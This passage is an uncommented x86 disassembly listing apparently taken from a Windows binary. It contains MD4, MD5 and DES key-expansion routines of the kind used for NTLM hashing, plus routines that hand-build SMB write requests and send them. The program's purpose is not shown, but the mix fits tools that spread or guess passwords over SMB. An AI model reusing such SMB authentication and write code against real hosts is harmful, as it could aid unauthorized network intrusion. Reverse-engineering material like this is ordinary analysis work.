mov dword_41ACE4, eax
push 0Bh
push dword_41ACDC
push dword_41ACD8
push dword_41ACE4
call sub_41405C
add esp, 0Ch
add eax, dword_41ACE0
add eax, [ebp-4Ch]
push eax
call sub_41401E
add esp, 8
mov dword_41ACE0, eax
push 13h
push dword_41ACD8
push dword_41ACE4
push dword_41ACE0
call sub_41405C
add esp, 0Ch
add eax, dword_41ACDC
add eax, [ebp-48h]
push eax
call sub_41401E
add esp, 8
mov dword_41ACDC, eax
push 3
push dword_41ACE4
push dword_41ACE0
push dword_41ACDC
call sub_41405C
add esp, 0Ch
add eax, dword_41ACD8
add eax, [ebp-44h]
push eax
call sub_41401E
add esp, 8
mov dword_41ACD8, eax
push 7
push dword_41ACE0
push dword_41ACDC
push dword_41ACD8
call sub_41405C
add esp, 0Ch
add eax, dword_41ACE4
add eax, [ebp-40h]
push eax
call sub_41401E
add esp, 8
mov dword_41ACE4, eax
push 0Bh
push dword_41ACDC
push dword_41ACD8
push dword_41ACE4
call sub_41405C
add esp, 0Ch
add eax, dword_41ACE0
add eax, [ebp-3Ch]
push eax
call sub_41401E
add esp, 8
mov dword_41ACE0, eax
push 13h
push dword_41ACD8
push dword_41ACE4
push dword_41ACE0
call sub_41405C
add esp, 0Ch
add eax, dword_41ACDC
add eax, [ebp-38h]
push eax
call sub_41401E
add esp, 8
mov dword_41ACDC, eax
push 3
push dword_41ACE4
push dword_41ACE0
push dword_41ACDC
call sub_41405C
add esp, 0Ch
add eax, dword_41ACD8
add eax, [ebp-34h]
push eax
call sub_41401E
add esp, 8
mov dword_41ACD8, eax
push 7
push dword_41ACE0
push dword_41ACDC
push dword_41ACD8
call sub_41405C
add esp, 0Ch
add eax, dword_41ACE4
add eax, [ebp-30h]
push eax
call sub_41401E
add esp, 8
mov dword_41ACE4, eax
push 0Bh
push dword_41ACDC
push dword_41ACD8
push dword_41ACE4
call sub_41405C
add esp, 0Ch
add eax, dword_41ACE0
add eax, [ebp-2Ch]
push eax
call sub_41401E
add esp, 8
mov dword_41ACE0, eax
push 13h
push dword_41ACD8
push dword_41ACE4
push dword_41ACE0
call sub_41405C
add esp, 0Ch
add eax, dword_41ACDC
add eax, [ebp-28h]
push eax
call sub_41401E
add esp, 8
mov dword_41ACDC, eax
push 3
push dword_41ACE4
push dword_41ACE0
push dword_41ACDC
call sub_41405C
add esp, 0Ch
add eax, dword_41ACD8
add eax, [ebp-24h]
push eax
call sub_41401E
add esp, 8
mov dword_41ACD8, eax
push 7
push dword_41ACE0
push dword_41ACDC
push dword_41ACD8
call sub_41405C
add esp, 0Ch
add eax, dword_41ACE4
add eax, [ebp-20h]
push eax
call sub_41401E
add esp, 8
mov dword_41ACE4, eax
push 0Bh
push dword_41ACDC
push dword_41ACD8
push dword_41ACE4
call sub_41405C
add esp, 0Ch
add eax, dword_41ACE0
add eax, [ebp-1Ch]
push eax
call sub_41401E
add esp, 8
mov dword_41ACE0, eax
push 13h
push dword_41ACD8
push dword_41ACE4
push dword_41ACE0
call sub_41405C
add esp, 0Ch
add eax, dword_41ACDC
add eax, [ebp-18h]
push eax
call sub_41401E
add esp, 8
mov dword_41ACDC, eax
push 3
push dword_41ACE4
push dword_41ACE0
push dword_41ACDC
call sub_414041
add esp, 0Ch
add eax, dword_41ACD8
add eax, [ebp-54h]
add eax, 5A827999h
push eax
call sub_41401E
add esp, 8
mov dword_41ACD8, eax
push 5
push dword_41ACE0
push dword_41ACDC
push dword_41ACD8
call sub_414041
add esp, 0Ch
add eax, dword_41ACE4
add eax, [ebp-44h]
add eax, 5A827999h
push eax
call sub_41401E
add esp, 8
mov dword_41ACE4, eax
push 9
push dword_41ACDC
push dword_41ACD8
push dword_41ACE4
call sub_414041
add esp, 0Ch
add eax, dword_41ACE0
add eax, [ebp-34h]
add eax, 5A827999h
push eax
call sub_41401E
add esp, 8
mov dword_41ACE0, eax
push 0Dh
push dword_41ACD8
push dword_41ACE4
push dword_41ACE0
call sub_414041
add esp, 0Ch
add eax, dword_41ACDC
add eax, [ebp-24h]
add eax, 5A827999h
push eax
call sub_41401E
add esp, 8
mov dword_41ACDC, eax
push 3
push dword_41ACE4
push dword_41ACE0
push dword_41ACDC
call sub_414041
add esp, 0Ch
add eax, dword_41ACD8
add eax, [ebp-50h]
add eax, 5A827999h
push eax
call sub_41401E
add esp, 8
mov dword_41ACD8, eax
push 5
push dword_41ACE0
push dword_41ACDC
push dword_41ACD8
call sub_414041
add esp, 0Ch
add eax, dword_41ACE4
add eax, [ebp-40h]
add eax, 5A827999h
push eax
call sub_41401E
add esp, 8
mov dword_41ACE4, eax
push 9
push dword_41ACDC
push dword_41ACD8
push dword_41ACE4
call sub_414041
add esp, 0Ch
add eax, dword_41ACE0
add eax, [ebp-30h]
add eax, 5A827999h
push eax
call sub_41401E
add esp, 8
mov dword_41ACE0, eax
push 0Dh
push dword_41ACD8
push dword_41ACE4
push dword_41ACE0
call sub_414041
add esp, 0Ch
add eax, dword_41ACDC
add eax, [ebp-20h]
add eax, 5A827999h
push eax
call sub_41401E
add esp, 8
mov dword_41ACDC, eax
push 3
push dword_41ACE4
push dword_41ACE0
push dword_41ACDC
call sub_414041
add esp, 0Ch
add eax, dword_41ACD8
add eax, [ebp-4Ch]
add eax, 5A827999h
push eax
call sub_41401E
add esp, 8
mov dword_41ACD8, eax
push 5
push dword_41ACE0
push dword_41ACDC
push dword_41ACD8
call sub_414041
add esp, 0Ch
add eax, dword_41ACE4
add eax, [ebp-3Ch]
add eax, 5A827999h
push eax
call sub_41401E
add esp, 8
mov dword_41ACE4, eax
push 9
push dword_41ACDC
push dword_41ACD8
push dword_41ACE4
call sub_414041
add esp, 0Ch
add eax, dword_41ACE0
add eax, [ebp-2Ch]
add eax, 5A827999h
push eax
call sub_41401E
add esp, 8
mov dword_41ACE0, eax
push 0Dh
push dword_41ACD8
push dword_41ACE4
push dword_41ACE0
call sub_414041
add esp, 0Ch
add eax, dword_41ACDC
add eax, [ebp-1Ch]
add eax, 5A827999h
push eax
call sub_41401E
add esp, 8
mov dword_41ACDC, eax
push 3
push dword_41ACE4
push dword_41ACE0
push dword_41ACDC
call sub_414041
add esp, 0Ch
add eax, dword_41ACD8
add eax, [ebp-48h]
add eax, 5A827999h
push eax
call sub_41401E
add esp, 8
mov dword_41ACD8, eax
push 5
push dword_41ACE0
push dword_41ACDC
push dword_41ACD8
call sub_414041
add esp, 0Ch
add eax, dword_41ACE4
add eax, [ebp-38h]
add eax, 5A827999h
push eax
call sub_41401E
add esp, 8
mov dword_41ACE4, eax
push 9
push dword_41ACDC
push dword_41ACD8
push dword_41ACE4
call sub_414041
add esp, 0Ch
add eax, dword_41ACE0
add eax, [ebp-28h]
add eax, 5A827999h
push eax
call sub_41401E
add esp, 8
mov dword_41ACE0, eax
push 0Dh
push dword_41ACD8
push dword_41ACE4
push dword_41ACE0
call sub_414041
add esp, 0Ch
add eax, dword_41ACDC
add eax, [ebp-18h]
add eax, 5A827999h
push eax
call sub_41401E
add esp, 8
mov dword_41ACDC, eax
push 3
push dword_41ACE4
push dword_41ACE0
push dword_41ACDC
call sub_414010
add esp, 0Ch
add eax, dword_41ACD8
add eax, [ebp-54h]
add eax, 6ED9EBA1h
push eax
call sub_41401E
add esp, 8
mov dword_41ACD8, eax
push 9
push dword_41ACE0
push dword_41ACDC
push dword_41ACD8
call sub_414010
add esp, 0Ch
add eax, dword_41ACE4
add eax, [ebp-34h]
add eax, 6ED9EBA1h
push eax
call sub_41401E
add esp, 8
mov dword_41ACE4, eax
push 0Bh
push dword_41ACDC
push dword_41ACD8
push dword_41ACE4
call sub_414010
add esp, 0Ch
add eax, dword_41ACE0
add eax, [ebp-44h]
add eax, 6ED9EBA1h
push eax
call sub_41401E
add esp, 8
mov dword_41ACE0, eax
push 0Fh
push dword_41ACD8
push dword_41ACE4
push dword_41ACE0
call sub_414010
add esp, 0Ch
add eax, dword_41ACDC
add eax, [ebp-24h]
add eax, 6ED9EBA1h
push eax
call sub_41401E
add esp, 8
mov dword_41ACDC, eax
push 3
push dword_41ACE4
push dword_41ACE0
push dword_41ACDC
call sub_414010
add esp, 0Ch
add eax, dword_41ACD8
add eax, [ebp-4Ch]
add eax, 6ED9EBA1h
push eax
call sub_41401E
add esp, 8
mov dword_41ACD8, eax
push 9
push dword_41ACE0
push dword_41ACDC
push dword_41ACD8
call sub_414010
add esp, 0Ch
add eax, dword_41ACE4
add eax, [ebp-2Ch]
add eax, 6ED9EBA1h
push eax
call sub_41401E
add esp, 8
mov dword_41ACE4, eax
push 0Bh
push dword_41ACDC
push dword_41ACD8
push dword_41ACE4
call sub_414010
add esp, 0Ch
add eax, dword_41ACE0
add eax, [ebp-3Ch]
add eax, 6ED9EBA1h
push eax
call sub_41401E
add esp, 8
mov dword_41ACE0, eax
push 0Fh
push dword_41ACD8
push dword_41ACE4
push dword_41ACE0
call sub_414010
add esp, 0Ch
add eax, dword_41ACDC
add eax, [ebp-1Ch]
add eax, 6ED9EBA1h
push eax
call sub_41401E
add esp, 8
mov dword_41ACDC, eax
push 3
push dword_41ACE4
push dword_41ACE0
push dword_41ACDC
call sub_414010
add esp, 0Ch
add eax, dword_41ACD8
add eax, [ebp-50h]
add eax, 6ED9EBA1h
push eax
call sub_41401E
add esp, 8
mov dword_41ACD8, eax
push 9
push dword_41ACE0
push dword_41ACDC
push dword_41ACD8
call sub_414010
add esp, 0Ch
add eax, dword_41ACE4
add eax, [ebp-30h]
add eax, 6ED9EBA1h
push eax
call sub_41401E
add esp, 8
mov dword_41ACE4, eax
push 0Bh
push dword_41ACDC
push dword_41ACD8
push dword_41ACE4
call sub_414010
add esp, 0Ch
add eax, dword_41ACE0
add eax, [ebp-40h]
add eax, 6ED9EBA1h
push eax
call sub_41401E
add esp, 8
mov dword_41ACE0, eax
push 0Fh
push dword_41ACD8
push dword_41ACE4
push dword_41ACE0
call sub_414010
add esp, 0Ch
add eax, dword_41ACDC
add eax, [ebp-20h]
add eax, 6ED9EBA1h
push eax
call sub_41401E
add esp, 8
mov dword_41ACDC, eax
push 3
push dword_41ACE4
push dword_41ACE0
push dword_41ACDC
call sub_414010
add esp, 0Ch
add eax, dword_41ACD8
add eax, [ebp-48h]
add eax, 6ED9EBA1h
push eax
call sub_41401E
add esp, 8
mov dword_41ACD8, eax
push 9
push dword_41ACE0
push dword_41ACDC
push dword_41ACD8
call sub_414010
add esp, 0Ch
add eax, dword_41ACE4
add eax, [ebp-28h]
add eax, 6ED9EBA1h
push eax
call sub_41401E
add esp, 8
mov dword_41ACE4, eax
push 0Bh
push dword_41ACDC
push dword_41ACD8
push dword_41ACE4
call sub_414010
add esp, 0Ch
add eax, dword_41ACE0
add eax, [ebp-38h]
add eax, 6ED9EBA1h
push eax
call sub_41401E
add esp, 8
mov dword_41ACE0, eax
push 0Fh
push dword_41ACD8
push dword_41ACE4
push dword_41ACE0
call sub_414010
add esp, 0Ch
add eax, dword_41ACDC
add eax, [ebp-18h]
add eax, 6ED9EBA1h
push eax
call sub_41401E
add esp, 8
mov dword_41ACDC, eax
mov eax, [ebp-8]
add dword_41ACD8, eax
mov edx, [ebp-0Ch]
add dword_41ACDC, edx
mov ecx, [ebp-10h]
add dword_41ACE0, ecx
mov eax, [ebp-14h]
add dword_41ACE4, eax
and dword_41ACD8, 0FFFFFFFFh
and dword_41ACDC, 0FFFFFFFFh
and dword_41ACE0, 0FFFFFFFFh
and dword_41ACE4, 0FFFFFFFFh
xor edx, edx
mov [ebp-4], edx
mov ecx, [ebp-4]
xor eax, eax
loc_413FFF: ; DATA XREF: sub_408DC0+54�o
; sub_408DC0+59�o ...
mov [ebp+ecx*4-54h], eax
inc dword ptr [ebp-4]
; ---------------------------------------------------------------------------
dword_414006 dd 10FC7D83h ; sub_4096E0+6F�r ...
word_41400A dw 0EE7Ch ; DATA XREF: sub_4096E0+81�o
dd 0C35DE58Bh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414010 proc near ; CODE XREF: rdata:00413C49�p
; rdata:00413C81�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor eax, [ebp+arg_4]
xor eax, [ebp+arg_8]
pop ebp
retn
sub_414010 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41401E proc near ; CODE XREF: rdata:004135AB�p
; rdata:004135DE�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
and [ebp+arg_0], 0FFFFFFFFh
mov ecx, [ebp+arg_4]
mov eax, [ebp+arg_0]
shl eax, cl
and eax, 0FFFFFFFFh
mov ecx, 20h
sub ecx, [ebp+arg_4]
mov edx, [ebp+arg_0]
shr edx, cl
or eax, edx
pop ebp
retn
sub_41401E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414041 proc near ; CODE XREF: rdata:004138C9�p
; rdata:00413901�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
mov edx, [ebp+arg_0]
and edx, [ebp+arg_8]
or eax, edx
mov ecx, [ebp+arg_4]
and ecx, [ebp+arg_8]
or eax, ecx
pop ebp
retn
sub_414041 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41405C proc near ; CODE XREF: rdata:00413599�p
; rdata:004135CC�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
loc_41405F: ; DATA XREF: sub_408440:loc_4085F4�o
; sub_408810+12�o ...
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
mov edx, [ebp+arg_0]
not edx
and edx, [ebp+arg_8]
or eax, edx
pop ebp
retn
sub_41405C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414071 proc near ; CODE XREF: sub_412C30+18E�p
; sub_412C30+31F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
loc_414072: ; DATA XREF: sub_408DC0+85�o
; sub_408DC0+2DA�o
mov ebp, esp
push ecx
xor eax, eax
mov [ebp+var_4], eax
loc_41407A: ; DATA XREF: sub_408DC0:loc_409408�o
mov edx, [ebp+var_4]
cmp edx, [ebp+arg_C]
jge short loc_4140A8
loc_414082: ; CODE XREF: sub_414071+35�j
; DATA XREF: sub_408DC0:loc_409264�o
mov ecx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov dl, [eax+ecx]
loc_41408B: ; DATA XREF: sub_408DC0:loc_409061�o
mov ecx, [ebp+arg_8]
mov eax, [ebp+var_4]
xor dl, [eax+ecx]
loc_414094: ; DATA XREF: sub_408440:loc_40861D�o
; sub_4089C0+E�o
mov ecx, [ebp+var_4]
mov eax, [ebp+arg_0]
loc_41409A: ; DATA XREF: sub_408A40+1B�o
; sub_408AD0+28�o ...
mov [ecx+eax], dl
inc [ebp+var_4]
mov edx, [ebp+var_4]
loc_4140A3: ; DATA XREF: sub_408A40+30�o
; sub_408AD0+41�o ...
cmp edx, [ebp+arg_C]
jl short loc_414082
loc_4140A8: ; CODE XREF: sub_414071+F�j
pop ecx
pop ebp
retn
sub_414071 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4140AB proc near ; CODE XREF: sub_412C30+AC�p
; sub_412C30+391�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
jmp short loc_4140C0
; ---------------------------------------------------------------------------
loc_4140B0: ; CODE XREF: sub_4140AB+1E�j
mov eax, [ebp+arg_4]
mov dl, [eax]
loc_4140B5: ; DATA XREF: sub_408DC0:loc_409119�o
mov ecx, [ebp+arg_0]
mov [ecx], dl
inc [ebp+arg_4]
inc [ebp+arg_0]
loc_4140C0: ; CODE XREF: sub_4140AB+3�j
mov eax, [ebp+arg_C]
add [ebp+arg_C], 0FFFFFFFFh
test eax, eax
jnz short loc_4140B0
loc_4140CB: ; DATA XREF: sub_408DC0:loc_40943E�o
jmp short loc_4140DD
; ---------------------------------------------------------------------------
loc_4140CD: ; CODE XREF: sub_4140AB+3B�j
mov edx, [ebp+arg_8]
mov cl, [edx]
mov eax, [ebp+arg_0]
mov [eax], cl
inc [ebp+arg_8]
inc [ebp+arg_0]
loc_4140DD: ; CODE XREF: sub_4140AB:loc_4140CB�j
; DATA XREF: sub_408DC0:loc_40929A�o
mov edx, [ebp+arg_10]
add [ebp+arg_10], 0FFFFFFFFh
test edx, edx
jnz short loc_4140CD
pop ebp
retn
sub_4140AB endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 10h
push dword ptr [ebp+8]
loc_4140F2: ; DATA XREF: sub_408440:loc_40864E�o
; sub_4089C0+23�o
push dword ptr [ebp+10h]
call sub_4132D8
add esp, 0Ch
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4140FF proc near ; CODE XREF: sub_412AEE+10�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
xor edx, edx
mov dl, [eax]
sar edx, 1
mov ecx, [ebp+arg_4]
mov [ecx], dl
mov eax, [ebp+arg_0]
loc_414114: ; DATA XREF: sub_408AD0+14�o
mov dl, [eax]
and dl, 1
loc_414119: ; DATA XREF: sub_408810+43�o
; sub_408810+72�o ...
shl edx, 6
loc_41411C: ; DATA XREF: sub_408810+2B�o
mov ecx, [ebp+arg_0]
loc_41411F: ; DATA XREF: sub_408810+5A�o
xor eax, eax
mov al, [ecx+1]
sar eax, 2
or dl, al
mov ecx, [ebp+arg_4]
mov [ecx+1], dl
mov edx, [ebp+arg_0]
mov al, [edx+1]
loc_414135: ; DATA XREF: sub_408440:loc_4086A4�o
and al, 3
shl eax, 5
mov edx, [ebp+arg_0]
xor ecx, ecx
loc_41413F: ; DATA XREF: sub_408440+307�o
; sub_408440:loc_408783�o
mov cl, [edx+2]
sar ecx, 3
or al, cl
mov edx, [ebp+arg_4]
mov [edx+2], al
mov eax, [ebp+arg_0]
mov cl, [eax+2]
and cl, 7
shl ecx, 4
mov eax, [ebp+arg_0]
xor edx, edx
mov dl, [eax+3]
sar edx, 4
or cl, dl
mov eax, [ebp+arg_4]
mov [eax+3], cl
mov edx, [ebp+arg_0]
mov cl, [edx+3]
and cl, 0Fh
shl ecx, 3
mov eax, [ebp+arg_0]
xor edx, edx
loc_41417D: ; DATA XREF: sub_408440+F6�o
mov dl, [eax+4]
sar edx, 5
or cl, dl
mov eax, [ebp+arg_4]
mov [eax+4], cl
loc_41418B: ; DATA XREF: sub_408440+FE�o
mov edx, [ebp+arg_0]
mov cl, [edx+4]
loc_414191: ; DATA XREF: sub_408440:loc_40855A�o
and cl, 1Fh
shl ecx, 2
mov eax, [ebp+arg_0]
xor edx, edx
mov dl, [eax+5]
sar edx, 6
or cl, dl
mov eax, [ebp+arg_4]
mov [eax+5], cl
mov edx, [ebp+arg_0]
mov cl, [edx+5]
and cl, 3Fh
add ecx, ecx
mov eax, [ebp+arg_0]
xor edx, edx
mov dl, [eax+6]
sar edx, 7
or cl, dl
mov eax, [ebp+arg_4]
mov [eax+6], cl
mov edx, [ebp+arg_0]
mov cl, [edx+6]
and cl, 7Fh
mov eax, [ebp+arg_4]
mov [eax+7], cl
xor edx, edx
mov [ebp+var_4], edx
loc_4141DC: ; CODE XREF: sub_4140FF+ED�j
mov ecx, [ebp+arg_4]
mov eax, [ebp+var_4]
shl byte ptr [eax+ecx], 1
inc [ebp+var_4]
cmp [ebp+var_4], 8
jl short loc_4141DC
pop ecx
pop ebp
retn
sub_4140FF endp
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
dd 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414200 proc near ; CODE XREF: sub_4125D0+57�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov esi, 0FFFFFFFFh
mov ebx, [ebp+arg_0]
mov eax, [ebx+0Ch]
or eax, eax
jz loc_4142DB
mov esi, eax
push 0A3h
push 0
push esi
call sub_40F5F0
mov [ebp+var_4], esi
add esi, 4
mov dword ptr [esi], 424D53FFh
mov byte ptr [esi+4], 2Fh
mov byte ptr [esi+9], 18h
mov word ptr [esi+0Ah], 2001h
push esi
push ebx
call sub_412804
mov eax, [ebx+56h]
mov [esi+18h], ax
add esi, 20h
mov byte ptr [esi], 0Eh
mov byte ptr [esi+1], 0FFh
mov eax, [ebx+186h]
mov [esi+5], ax
mov dword ptr [esi+0Bh], 0FFFFFFFFh
mov word ptr [esi+0Fh], 0
mov eax, [ebp+arg_4]
mov [esi+7], eax
mov eax, [ebp+arg_C]
mov [esi+15h], ax
mov [esi+1Dh], ax
mov word ptr [esi+17h], 3Fh
add eax, 3Fh
mov [esi+3], ax
add esi, 1Fh
push [ebp+arg_C]
push [ebp+arg_8]
push esi
call sub_40F5BF
add esi, [ebp+arg_C]
mov edi, [ebp+var_4]
sub esi, edi
lea eax, [esi-4]
push eax
call sub_40A30E
mov [edi], eax
push 2000h
push edi
push esi
push edi
push dword ptr [ebx+8]
call sub_410DC0
cmp eax, 0FFFFFFFFh
jz short loc_4142DB
add edi, 4
mov esi, [edi+5]
add edi, 20h
movzx edx, word ptr [edi+7]
mov ecx, [ebp+arg_10]
mov [ecx], edx
loc_4142DB: ; CODE XREF: sub_414200+16�j
; sub_414200+C7�j
mov eax, esi
pop ebx
pop esi
pop edi
leave
retn 14h
sub_414200 endp
; ---------------------------------------------------------------------------
dd 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4142F0 proc near ; CODE XREF: sub_412840+2B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov esi, 0FFFFFFFFh
mov ebx, [ebp+arg_0]
or ebx, ebx
jz loc_4143F9
mov eax, [ebx+0Ch]
or eax, eax
jz loc_4143F9
mov esi, eax
push 0BBh
push 0
push esi
call sub_40F5F0
mov [ebp+var_4], esi
add esi, 4
mov dword ptr [esi], 424D53FFh
mov byte ptr [esi+4], 2Fh
mov byte ptr [esi+9], 18h
mov word ptr [esi+0Ah], 2001h
push esi
push ebx
call sub_412804
mov eax, [ebx+56h]
mov [esi+18h], ax
add esi, 20h
mov byte ptr [esi], 0Eh
mov byte ptr [esi+1], 0FFh
mov eax, [ebx+186h]
mov [esi+5], ax
mov dword ptr [esi+0Bh], 0FFFFFFFFh
mov word ptr [esi+0Fh], 8
mov eax, [ebp+arg_10]
add eax, 18h
mov [esi+11h], ax
mov [esi+15h], ax
mov [esi+1Dh], ax
mov word ptr [esi+17h], 3Fh
add esi, 1Fh
mov byte ptr [esi], 5
mov eax, [ebp+arg_8]
mov [esi+3], al
mov dword ptr [esi+4], 10h
mov eax, [ebp+arg_10]
add eax, 18h
mov [esi+8], ax
mov eax, [ebp+arg_10]
mov [esi+10h], eax
mov eax, [ebp+arg_4]
mov [esi+16h], ax
add esi, 18h
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call sub_40F5BF
add esi, [ebp+arg_10]
mov edi, [ebp+var_4]
sub esi, edi
lea eax, [esi-4]
push eax
call sub_40A30E
mov [edi], eax
push 1000h
push edi
push esi
push edi
push dword ptr [ebx+8]
call sub_410DC0
mov esi, eax
cmp eax, 0FFFFFFFFh
jz short loc_4143F9
add edi, 4
mov esi, [edi+5]
add edi, 20h
movzx edx, word ptr [edi+7]
mov ecx, [ebp+arg_14]
mov [ecx], edx
loc_4143F9: ; CODE XREF: sub_4142F0+13�j
; sub_4142F0+1E�j ...
mov eax, esi
pop ebx
pop esi
pop edi
leave
retn 18h
sub_4142F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_414402 proc near ; CODE XREF: rdata:0040FB45�p
jmp ds:dword_41317C
sub_414402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_414408 proc near ; CODE XREF: sub_411800+DB�p
; sub_412A2B+40�p
jmp ds:dword_413184
sub_414408 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41440E proc near ; CODE XREF: rdata:0040FB8F�p
jmp ds:dword_413150
sub_41440E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_414414 proc near ; CODE XREF: sub_410DC0+134�p
; sub_410DC0+15B�p ...
jmp ds:dword_413148
sub_414414 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41441A proc near ; CODE XREF: sub_411BD0+19�p
; sub_411BD0+3F�p
jmp ds:dword_41314C
sub_41441A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_414420 proc near ; CODE XREF: rdata:0040F636�p
; rdata:0040F77C�p
jmp ds:dword_413168
sub_414420 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_414426 proc near ; CODE XREF: rdata:0040F880�p
jmp ds:dword_413008
sub_414426 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41442C proc near ; CODE XREF: rdata:0040F920�p
jmp ds:dword_41300C
sub_41442C endp
; ---------------------------------------------------------------------------
dw 0CCCCh
dd 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414440 proc near ; CODE XREF: sub_40FC26+38�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push edi
push esi
push ebx
push 10h
push 0
push [ebp+arg_4]
call sub_40F5F0
push [ebp+arg_0]
push [ebp+arg_4]
call loc_414470
pop ebx
pop esi
pop edi
leave
retn 8
sub_414440 endp
; ---------------------------------------------------------------------------
dd 24A48Dh, 5000000h, 0
; ---------------------------------------------------------------------------
loc_414470: ; CODE XREF: sub_414440+18�p
mov eax, [esp+4]
push ebx
mov ecx, [esp+0Ch]
push esi
push edi
mov edx, [eax+4]
push ebp
mov esi, [eax+8]
mov edi, [eax+0Ch]
mov ebp, [ecx]
mov ebx, edi
xor ebx, esi
and ebx, edx
xor ebx, edi
add ebx, ebp
mov ebp, [eax]
lea ebx, [ebx+ebp-28955B88h]
rol ebx, 7
mov eax, esi
add ebx, edx
xor eax, edx
and eax, ebx
mov ebp, [ecx+4]
xor eax, esi
add edi, ebp
add eax, 0E8C7B756h
add edi, eax
rol edi, 0Ch
mov eax, edx
add edi, ebx
xor eax, ebx
and eax, edi
mov ebp, [ecx+8]
xor eax, edx
add esi, ebp
add eax, 242070DBh
add esi, eax
rol esi, 11h
mov eax, edi
add esi, edi
xor eax, ebx
and eax, esi
mov ebp, [ecx+0Ch]
xor eax, ebx
add edx, ebp
add eax, 0C1BDCEEEh
add edx, eax
rol edx, 16h
mov eax, edi
add edx, esi
xor eax, esi
and eax, edx
mov ebp, [ecx+10h]
xor eax, edi
add ebx, ebp
add eax, 0F57C0FAFh
add ebx, eax
rol ebx, 7
loc_414501: ; DATA XREF: sub_409ED0:loc_409F25�o
mov eax, esi
add ebx, edx
xor eax, edx
and eax, ebx
mov ebp, [ecx+14h]
xor eax, esi
loc_41450E: ; DATA XREF: sub_403D90+C�o
; sub_4099E5:loc_409A0C�o ...
add edi, ebp
add eax, 4787C62Ah
add edi, eax
rol edi, 0Ch
mov eax, edx
add edi, ebx
xor eax, ebx
and eax, edi
mov ebp, [ecx+18h]
xor eax, edx
add esi, ebp
add eax, 0A8304613h
add esi, eax
rol esi, 11h
mov eax, edi
add esi, edi
loc_414537: ; DATA XREF: rdata:004047C7�o
; sub_409C10+110�o
xor eax, ebx
and eax, esi
mov ebp, [ecx+1Ch]
xor eax, ebx
loc_414540: ; DATA XREF: rdata:004047E4�o
; sub_409C10+12B�o
add edx, ebp
add eax, 0FD469501h
add edx, eax
rol edx, 16h
mov eax, edi
add edx, esi
xor eax, esi
and eax, edx
mov ebp, [ecx+20h]
loc_414557: ; DATA XREF: sub_404A80+5C�o
; sub_409C10+EE�o
xor eax, edi
add ebx, ebp
add eax, 698098D8h
add ebx, eax
rol ebx, 7
mov eax, esi
add ebx, edx
xor eax, edx
and eax, ebx
mov ebp, [ecx+24h]
xor eax, esi
add edi, ebp
add eax, 8B44F7AFh
add edi, eax
rol edi, 0Ch
mov eax, edx
add edi, ebx
xor eax, ebx
and eax, edi
mov ebp, [ecx+28h]
xor eax, edx
loc_41458B: ; DATA XREF: rdata:004046F6�o
add esi, ebp
add eax, 0FFFF5BB1h
loc_414592: ; DATA XREF: sub_404A80+48�o
add esi, eax
rol esi, 11h
mov eax, edi
add esi, edi
xor eax, ebx
and eax, esi
mov ebp, [ecx+2Ch]
xor eax, ebx
add edx, ebp
add eax, 895CD7BEh
add edx, eax
rol edx, 16h
mov eax, edi
add edx, esi
xor eax, esi
and eax, edx
mov ebp, [ecx+30h]
xor eax, edi
add ebx, ebp
add eax, 6B901122h
add ebx, eax
rol ebx, 7
mov eax, esi
add ebx, edx
xor eax, edx
and eax, ebx
mov ebp, [ecx+34h]
xor eax, esi
add edi, ebp
add eax, 0FD987193h
add edi, eax
rol edi, 0Ch
